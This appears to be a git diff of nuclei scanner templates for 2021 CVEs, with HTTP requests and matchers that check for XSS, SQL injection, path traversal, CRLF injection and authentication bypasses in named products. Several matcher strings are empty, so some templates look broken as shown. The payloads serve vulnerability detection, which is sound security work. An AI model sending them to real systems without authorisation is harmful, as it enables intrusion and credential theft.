"\"TABLENAME\":\"(?:(?:(?:(?:(?:APP_CONFIGDATA_RELATION_[PS]UB|SYS(?:(?:CONGLOMERAT|ALIAS|(?:FI|RO)L)E|(?:(?:ROUTINE)?|COL)PERM|(?:FOREIGN)?KEY|CONSTRAINT|T(?:ABLEPERM|RIGGER)|S(?:TAT(?:EMENT|ISTIC)|EQUENCE|CHEMA)|DEPEND|CHECK|VIEW|USER)|USER|ROLE)S|CONFIG_(?:TAGS_RELATION|INFO_(?:AGGR|BETA|TAG))|TENANT_CAPACITY|GROUP_CAPACITY|PERMISSIONS|SYSCOLUMNS|SYS(?:DUMMY1|TABLES)|APP_LIST)|CONFIG_INFO)|TENANT_INFO)|HIS_CONFIG_INFO)\"" + part: body diff --git a/nuclei-templates/CVE-2021/CVE-2021-29484.yaml b/nuclei-templates/CVE-2021/CVE-2021-29484.yaml new file mode 100644 index 0000000000..937184490c --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-29484.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-29484 + +info: + name: DOM XSS in Ghost CMS + author: rootxharsh,iamnoooob + severity: medium + description: Ghost is a Node.js CMS. An unused endpoint added during the development of 4.0.0 has left sites vulnerable to untrusted users gaining access to Ghost Admin. Attackers can gain access by getting logged in users to click a link containing malicious code. Users do not need to enter credentials and may not know they've visited a malicious site. + reference: + - https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg + - https://nvd.nist.gov/vuln/detail/CVE-2021-29484 + - https://www.npmjs.com/package/ghost + - https://forum.ghost.org/t/critical-security-update-available-for-ghost-4-x/22290 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-29484 + cwe-id: CWE-79 + tags: cve,cve2021,xss,ghost + +requests: + - method: GET + path: + - "{{BaseURL}}/ghost/preview" + + matchers-condition: and + matchers: + - type: word + words: + - 'XMLHttpRequest.prototype.open' + part: body + + - type: word + words: + - 'text/html' + part: header + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-29622.yaml b/nuclei-templates/CVE-2021/CVE-2021-29622.yaml new file mode 100644 index 0000000000..9ce1f43762 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-29622.yaml @@ -0,0 +1,28 @@ +id: CVE-2021-29622 + +info: + name: Prometheus v2.23.0 to v2.26.0, and v2.27.0 Open Redirect + author: geeknik + severity: medium + description: In 2.23.0, Prometheus changed its default UI to the New ui. To ensure a seamless transition, the URL's prefixed by /new redirect to /. Due to a bug in the code, it is possible for an attacker to craft an URL that can redirect to any other URL, in the /new endpoint. + reference: + - https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7 + - https://github.com/prometheus/prometheus/releases/tag/v2.26.1 + - https://github.com/prometheus/prometheus/releases/tag/v2.27.1 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-29622 + cwe-id: CWE-601 + tags: cve,cve2021,prometheus,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/new/newhttp://example.com" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header diff --git a/nuclei-templates/CVE-2021/CVE-2021-29625.yaml b/nuclei-templates/CVE-2021/CVE-2021-29625.yaml index 70287d1af1..d5e3bd655d 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-29625.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-29625.yaml @@ -3,18 +3,17 @@ id: CVE-2021-29625 info: name: Adminer reflected XSS via the table parameter author: daffainfo - severity: medium description: Adminer is open-source database management software. A cross-site scripting vulnerability in Adminer versions 4.6.1 to 4.8.0 affects users of MySQL, MariaDB, PgSQL and SQLite. XSS is in most cases prevented by strict CSP in all modern browsers. The only exception is when Adminer is using a `pdo_` extension to communicate with the database (it is used if the native extensions are not enabled). In browsers without CSP, Adminer versions 4.6.1 to 4.8.0 are affected. The vulnerability is patched in version 4.8.1. As workarounds, one can use a browser supporting strict CSP or enable the native PHP extensions (e.g. `mysqli`) or disable displaying PHP errors (`display_errors`). + severity: medium reference: - https://sourceforge.net/p/adminer/bugs-and-features/797/ - https://www.cvedetails.com/cve/CVE-2021-29625/ - - https://github.com/vrana/adminer/commit/4043092ec2c0de2258d60a99d0c5958637d051a7 + tags: cve,cve2021,adminer,xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2021-29625 cwe-id: CWE-79 - tags: cve,cve2021,adminer,xss requests: - method: GET diff --git a/nuclei-templates/CVE-2021/CVE-2021-30049.yaml b/nuclei-templates/CVE-2021/CVE-2021-30049.yaml new file mode 100644 index 0000000000..6cff3a24b3 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-30049.yaml @@ -0,0 +1,37 @@ +id: CVE-2021-30049 + +info: + name: SysAid Technologies 20.3.64 b14 Reflected XSS + author: daffainfo + severity: medium + description: SysAid 20.3.64 b14 is affected by Cross Site Scripting (XSS) via a /KeepAlive.jsp?stamp= URI. + reference: + - https://eh337.net/2021/03/30/sysaid/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30049 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-30049 + cwe-id: CWE-79 + tags: cve,cve2021,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-30151.yaml b/nuclei-templates/CVE-2021/CVE-2021-30151.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-30151.yaml rename to nuclei-templates/CVE-2021/CVE-2021-30151.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-3017.yaml b/nuclei-templates/CVE-2021/CVE-2021-3017.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-3017.yaml rename to nuclei-templates/CVE-2021/CVE-2021-3017.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-3019.yaml b/nuclei-templates/CVE-2021/CVE-2021-3019.yaml deleted file mode 100644 index 68902d8672..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-3019.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2021-3019 - -info: - name: ffay lanproxy Directory Traversal - author: pikpikcu - severity: high - description: ffay lanproxy 0.1 is susceptible to a directory traversal vulnerability that could let attackers read /../conf/config.properties to obtain credentials for a connection to the intranet. - reference: - - https://github.com/ffay/lanproxy/commits/master - - https://github.com/maybe-why-not/lanproxy/issues/1 - - https://nvd.nist.gov/vuln/detail/CVE-2021-3019 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-3019 - cwe-id: CWE-22 - tags: cve,cve2021,lanproxy,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/../conf/config.properties" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "application/octet-stream" - condition: and - part: header - - type: word - words: - - "config.admin.username" - - "config.admin.password" - condition: and - part: body - -# Enhanced by mp on 2022/04/04 diff --git a/nuclei-templates/CVE-2021/CVE-2021-30213.yaml b/nuclei-templates/CVE-2021/CVE-2021-30213.yaml deleted file mode 100644 index b2819c12c4..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-30213.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2021-30213 - -info: - name: Knowage Suite 7.3 XSS - author: alph4byt3 - severity: medium - description: Knowage Suite 7.3 is vulnerable to unauthenticated reflected cross-site scripting (XSS). An attacker can inject arbitrary web script in '/servlet/AdapterHTTP' via the 'targetService' parameter. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-30213 - - https://github.com/piuppi/Proof-of-Concepts/blob/main/Engineering/XSS-KnowageSuite7-3_unauth.md - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-30213 - cwe-id: CWE-79 - tags: cve,cve2021,xss,knowage - -requests: - - method: GET - path: - - "{{BaseURL}}/knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - - type: status - status: - - 200 - - - type: word - part: header - words: - - text/html diff --git a/nuclei-templates/CVE-2021/CVE-2021-30497.yaml b/nuclei-templates/CVE-2021/CVE-2021-30497.yaml deleted file mode 100644 index 28669446a4..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-30497.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2021-30497 - -info: - name: Ivanti Avalanche Directory Traversal - author: gy741 - severity: high - description: A directory traversal vulnerability in Ivanti Avalanche allows remote unauthenticated user to access files that reside outside the 'image' folder - reference: - - https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/ - - https://forums.ivanti.com/s/article/Security-Alert-CVE-2021-30497-Directory-Traversal-Vulnerability?language=en_US - - https://help.ivanti.com/wl/help/en_us/aod/5.4/Avalanche/Console/Launching_the_Avalanche.htm - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-30497 - tags: cve,cve2021,avalanche,traversal - -requests: - - method: GET - path: - - "{{BaseURL}}/AvalancheWeb/image?imageFilePath=C:/windows/win.ini" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "for 16-bit app support" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-31249.yaml b/nuclei-templates/CVE-2021/CVE-2021-31249.yaml deleted file mode 100644 index 691a739a17..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-31249.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2021-31249 - -info: - name: CHIYU TCP/IP Converter devices - CRLF injection - author: geeknik - severity: medium - description: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter 'redirect' available on multiple CGI components. - reference: - - https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249 - - https://www.chiyu-tech.com/msg/message-Firmware-update-87.html - - https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N - cvss-score: 6.5 - cve-id: CVE-2021-31249 - tags: cve,cve2021,chiyu,crlf,iot - -requests: - - method: GET - path: - - "{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY" - - matchers-condition: and - matchers: - - type: status - status: - - 302 - - type: word - part: header - words: - - "Location: setting.htm" - - "" - condition: and diff --git a/nuclei-templates/CVE-2021/CVE-2021-31250.yaml b/nuclei-templates/CVE-2021/CVE-2021-31250.yaml new file mode 100644 index 0000000000..1979dd2372 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-31250.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-31250 + +info: + name: CHIYU IoT XSS + author: geeknik + severity: medium + description: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws. + reference: + - https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250 + - https://www.chiyu-tech.com/msg/message-Firmware-update-87.htm + - https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2021-31250 + cwe-id: CWE-79 + tags: cve,cve2021,chiyu,xss,iot + +requests: + - method: GET + path: + - "{{BaseURL}}/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY" + headers: + Authorization: "Basic OmFkbWlu" + + redirects: true + matchers-condition: and + matchers: + - type: word + part: header + words: + - "text/html" + - type: word + part: body + words: + - "\">" diff --git a/nuclei-templates/CVE-2021/cve-2021-31537.yaml b/nuclei-templates/CVE-2021/CVE-2021-31537.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-31537.yaml rename to nuclei-templates/CVE-2021/CVE-2021-31537.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-31581.yaml b/nuclei-templates/CVE-2021/CVE-2021-31581.yaml new file mode 100644 index 0000000000..efba6256c5 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-31581.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-31581 + +info: + name: Akkadian Provisioning Manager MariaDB Credentials + author: geeknik + severity: medium + description: The restricted shell provided by Akkadian Provisioning Manager Engine (PME) can be escaped by abusing the 'Edit MySQL Configuration' command. This command launches a standard vi editor interface which + can then be escaped. This issue was resolved in Akkadian OVA appliance version 3.0 (and later), Akkadian Provisioning Manager 5.0.2 (and later), and Akkadian Appliance Manager 3.3.0.314-4a349e0 (and later). + reference: + - https://threatpost.com/unpatched-bugs-provisioning-cisco-uc/166882/ + - https://www.rapid7.com/blog/post/2021/06/08/akkadian-provisioning-manager-multiple-vulnerabilities-disclosure/ + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.4 + cve-id: CVE-2021-31581 + cwe-id: CWE-312 + tags: cve,cve2021,akkadian,mariadb,disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}/pme/database/pme/phinx.yml" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "host:" + - "name:" + - "pass:" + condition: and + + - type: word + words: + - "html>" + negative: true diff --git a/nuclei-templates/CVE-2021/CVE-2021-31589.yaml b/nuclei-templates/CVE-2021/CVE-2021-31589.yaml deleted file mode 100644 index f28ff8aa59..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-31589.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2021-31589 - -info: - name: BeyondTrust Remote Support Reflected XSS - author: Ahmed Abou-Ela - severity: medium - description: Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML. - reference: - - https://packetstormsecurity.com/files/165408 - - https://cxsecurity.com/issue/WLB-2022010013 - - https://beyondtrustcorp.service-now.com/csm?sys_kb_id=922d0ab31bc1b490e73854ae034bcb7b&id=kb_article_view&sysparm_rank=1&sysparm_tsqueryId=64fc14ffdb8f70d422725385ca9619cb - - https://www.beyondtrust.com/docs/release-notes/index.htm - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-31589 - cwe-id: CWE-79 - metadata: - google-dork: '"BeyondTrust" "Redistribution Prohibited"' - shodan-query: 'set-cookie: nsbase_session' - tags: cve,cve2021,beyondtrust,bomgar,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password" - - matchers-condition: and - matchers: - - type: word - case-insensitive: true - part: body - words: - - '' - - 'bomgar' - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-31682.yaml b/nuclei-templates/CVE-2021/CVE-2021-31682.yaml new file mode 100644 index 0000000000..84cf77c107 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-31682.yaml @@ -0,0 +1,44 @@ +id: CVE-2021-31682 + +info: + name: WebCTRL OEM <= 6.5 Reflected Cross-Site Scripting + author: gy741,dhiyaneshDk + severity: medium + description: WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-31682 + - https://github.com/3ndG4me/WebCTRL-OperatorLocale-Parameter-Reflected-XSS + - https://www.automatedlogic.com/en/products-services/webctrl-building-automation-system/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-31682 + cwe-id: CWE-79 + metadata: + shodan-query: html:"/_common/lvl5/dologin.jsp" + tags: cve,cve2021,webctrl,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + condition: and + words: + - '">' + - 'common/lvl5' + + - type: word + part: header + words: + - "text/html" + +# Enhanced by mp on 2022/04/13 diff --git a/nuclei-templates/CVE-2021/CVE-2021-31755.yaml b/nuclei-templates/CVE-2021/CVE-2021-31755.yaml index 2e3d564f16..5b079c43b2 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-31755.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-31755.yaml @@ -1,21 +1,19 @@ id: CVE-2021-31755 info: - name: Tenda Router AC11 - Remote Command Injection + name: Tenda Router AC11 RCE + description: Vulnerabilities in the web-based management interface of enda Router AC11 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. author: gy741 severity: critical - description: Tenda Router AC11 is susceptible to remote command injection vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection - attacks against an affected device. reference: - https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3 - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai - - https://nvd.nist.gov/vuln/detail/CVE-2021-31755 + tags: cve,cve2021,tenda,rce,oast,router,mirai classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2021-31755 cwe-id: CWE-787 - tags: cve,cve2021,tenda,rce,oast,router,mirai requests: - raw: @@ -33,5 +31,3 @@ requests: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# Enhanced by mp on 2022/04/14 diff --git a/nuclei-templates/CVE-2021/CVE-2021-31856.yaml b/nuclei-templates/CVE-2021/CVE-2021-31856.yaml new file mode 100644 index 0000000000..e087dac85d --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-31856.yaml @@ -0,0 +1,38 @@ +id: CVE-2021-31856 + +info: + name: Layer5 Meshery 0.5.2 - SQL Injection + author: princechaddha + severity: critical + description: Layer5 Meshery 0.5.2 contains a SQL injection vulnerability in the REST API that allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns + in models/meshery_pattern_persister.go). + reference: + - https://github.com/ssst0n3/CVE-2021-31856 + - https://nvd.nist.gov/vuln/detail/CVE-2021-31856 + - https://meshery.io + - https://github.com/layer5io/meshery/pull/2745 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-31856 + cwe-id: CWE-89 + tags: sqli,cve,cve2021 + +requests: + - method: GET + path: + - "{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0" + + matchers-condition: and + matchers: + + - type: word + words: + - "709b38b27304df6257a86a60df742c4c" + part: body + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/17 diff --git a/nuclei-templates/CVE-2021/CVE-2021-31862.yaml b/nuclei-templates/CVE-2021/CVE-2021-31862.yaml new file mode 100644 index 0000000000..002a8fdbff --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-31862.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-31862 + +info: + name: SysAid - Reflected XSS + author: jas37 + severity: medium + description: SysAid 20.4.74 allows XSS via the KeepAlive.jsp stamp parameter without any authentication. + reference: + - https://github.com/RobertDra/CVE-2021-31862/blob/main/README.md + - https://nvd.nist.gov/vuln/detail/CVE-2021-31862 + - https://www.sysaid.com/product/on-premise/latest-release + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-31862 + cwe-id: CWE-79 + tags: cve,cve2021,xss,sysaid + +requests: + - method: GET + path: + - '{{BaseURL}}/KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E' + + matchers: + + - type: dsl + dsl: + - '(body == "false ")' + - 'status_code == 200' + condition: and \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-32030.yaml b/nuclei-templates/CVE-2021/CVE-2021-32030.yaml new file mode 100644 index 0000000000..6dc97ac75f --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-32030.yaml @@ -0,0 +1,47 @@ +id: CVE-2021-32030 + +info: + name: ASUS GT-AC2900 - Authentication Bypass + author: gy741 + severity: critical + description: "ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator application. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\0' matches the device's default value of '\0' in some situations." + reference: + - https://www.atredis.com/blog/2021/4/30/asus-authentication-bypass + - https://nvd.nist.gov/vuln/detail/CVE-2021-32030 + - https://github.com/atredispartners/advisories/blob/master/ATREDIS-2020-0010.md + - https://www.asus.com/Networking-IoT-Servers/WiFi-Routers/ASUS-Gaming-Routers/RT-AC2900/HelpDesk_BIOS/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-32030 + cwe-id: CWE-287 + tags: cve,cve2021,asus,auth-bypass,router + +requests: + - raw: + - | + GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1 + Host: {{Hostname}} + User-Agent: asusrouter-- + Referer: {{BaseURL}} + Cookie: asus_token=\0Invalid; clickedItem_tab=0 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - application/json + + - type: word + words: + - "get_cfg_clientlist" + - "alias" + - "model_name" + condition: and + +# Enhanced by mp on 2022/04/22 diff --git a/nuclei-templates/CVE-2021/cve-2021-32172.yaml b/nuclei-templates/CVE-2021/CVE-2021-32172.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-32172.yaml rename to nuclei-templates/CVE-2021/CVE-2021-32172.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-32618.yaml b/nuclei-templates/CVE-2021/CVE-2021-32618.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-32618.yaml rename to nuclei-templates/CVE-2021/CVE-2021-32618.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-32682.yaml b/nuclei-templates/CVE-2021/CVE-2021-32682.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-32682.yaml rename to nuclei-templates/CVE-2021/CVE-2021-32682.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-32819.yaml b/nuclei-templates/CVE-2021/CVE-2021-32819.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-32819.yaml rename to nuclei-templates/CVE-2021/CVE-2021-32819.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-32820.yaml b/nuclei-templates/CVE-2021/CVE-2021-32820.yaml index 0bed29da10..4d9d53ec47 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-32820.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-32820.yaml @@ -4,17 +4,16 @@ info: name: Express-handlebars Path Traversal author: dhiyaneshDk severity: high - description: Express-handlebars is a Handlebars view engine for Express. Express-handlebars mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extensions (i.e., file.extension) can be included. Files that lack an extension will have .handlebars appended to them. For complete details refer to the referenced GHSL-2021-018 report. Notes in documentation have been added to help users avoid this potential information exposure vulnerability. reference: - https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/ - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json - - https://github.com/express-handlebars/express-handlebars/pull/163 + tags: cve,cve2021,expressjs,lfi,xxe classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-score: 8.60 cve-id: CVE-2021-32820 cwe-id: CWE-200 - tags: cve,cve2021,expressjs,lfi,xxe + description: "Express-handlebars is a Handlebars view engine for Express. Express-handlebars mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extensions (i.e., file.extension) can be included. Files that lack an extension will have .handlebars appended to them. For complete details refer to the referenced GHSL-2021-018 report. Notes in documentation have been added to help users avoid this potential information exposure vulnerability." requests: - method: GET diff --git a/nuclei-templates/CVE-2021/cve-2021-32853.yaml b/nuclei-templates/CVE-2021/CVE-2021-32853.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-32853.yaml rename to nuclei-templates/CVE-2021/CVE-2021-32853.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-3293.yaml b/nuclei-templates/CVE-2021/CVE-2021-3293.yaml new file mode 100644 index 0000000000..25b185af9d --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-3293.yaml @@ -0,0 +1,38 @@ +id: CVE-2021-3293 + +info: + name: emlog 5.3.1 Path Disclosure + author: h1ei1 + severity: high + description: emlog v5.3.1 is susceptible to full path disclosure via t/index.php, which allows an attacker to see the path to the webroot/file. + reference: + - https://github.com/emlog/emlog/issues/62 + - https://github.com/thinkgad/Bugs/blob/main/emlog%20v5.3.1%20has%20Full%20Path%20Disclosure%20vulnerability.md + - https://nvd.nist.gov/vuln/detail/CVE-2021-3293 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-3293 + cwe-id: CWE-22 + tags: cve,cve2021,emlog,fpd + +requests: + - raw: + - | + GET /t/index.php?action[]=aaaa HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Warning" + - "on line" + - "expects parameter" + condition: and + +# Enhanced by mp on 2022/04/04 diff --git a/nuclei-templates/CVE-2021/cve-2021-3297.yaml b/nuclei-templates/CVE-2021/CVE-2021-3297.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-3297.yaml rename to nuclei-templates/CVE-2021/CVE-2021-3297.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-33044.yaml b/nuclei-templates/CVE-2021/CVE-2021-33044.yaml deleted file mode 100644 index 09217ac1d6..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-33044.yaml +++ /dev/null @@ -1,55 +0,0 @@ -id: CVE-2021-33044 - -info: - name: Dahua IPC/VTH/VTO devices Authentication Bypass - author: gy741 - severity: critical - description: The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. - reference: - - https://github.com/dorkerdevil/CVE-2021-33044 - - https://nvd.nist.gov/vuln/detail/CVE-2021-33044 - - https://seclists.org/fulldisclosure/2021/Oct/13 - - https://www.dahuasecurity.com/support/cybersecurity/details/957 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-33044 - cwe-id: CWE-287 - tags: dahua,cve,cve2021,auth-bypass - -requests: - - raw: - - | - POST /RPC2_Login HTTP/1.1 - Host: {{Hostname}} - Accept: application/json, text/javascript, */*; q=0.01 - Connection: close - X-Requested-With: XMLHttpRequest - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Origin: {{BaseURL}} - Referer: {{BaseURL}} - - {"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0} - - matchers-condition: and - matchers: - - - type: status - status: - - 200 - - - type: word - part: body - words: - - '"result":true' - - 'id' - - 'params' - - 'session' - condition: and - - extractors: - - type: regex - group: 1 - part: body - regex: - - ',"result":true,"session":"([a-z]+)"\}' diff --git a/nuclei-templates/CVE-2021/CVE-2021-33357.yaml 